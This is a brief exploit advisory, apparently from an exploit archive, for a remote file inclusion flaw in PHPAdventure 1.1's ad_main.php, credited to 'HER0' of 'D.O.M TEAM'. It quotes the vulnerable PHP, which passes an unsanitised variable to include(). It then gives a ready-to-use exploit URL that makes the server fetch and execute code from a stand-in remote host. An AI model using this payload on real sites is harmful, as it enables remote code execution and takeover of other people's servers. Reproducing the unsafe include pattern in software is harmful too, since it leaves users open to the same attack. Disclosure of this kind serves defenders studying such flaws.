id: 1133
date: 11/07/2006
title: PHPAdventure 1.1 (ad_main.php) Remote File Include Vulnerability
author: HER0
cves: 

================================================================
PHPAdventure 1.1 (ad_main.php) Remote File Include Vulnerability
================================================================



*********************************************
D.O.M TEAM
Bug found: HER0
cms: PHPAdventure
type: rfi
risk: High
nota: all the versions of PHPAdventure is affected..
********************************************
line of the code:

<?php
$_stage = 1;
include($_mygamefile);
?>

exploit:
/ad_main.php?_mygamefile=http://evilcode.txt?
****************************************************************
greetz:Sponge Bob,Bob esponja XDDDD...
******************************************************************************************



#  0day.today [2023-03-24]  #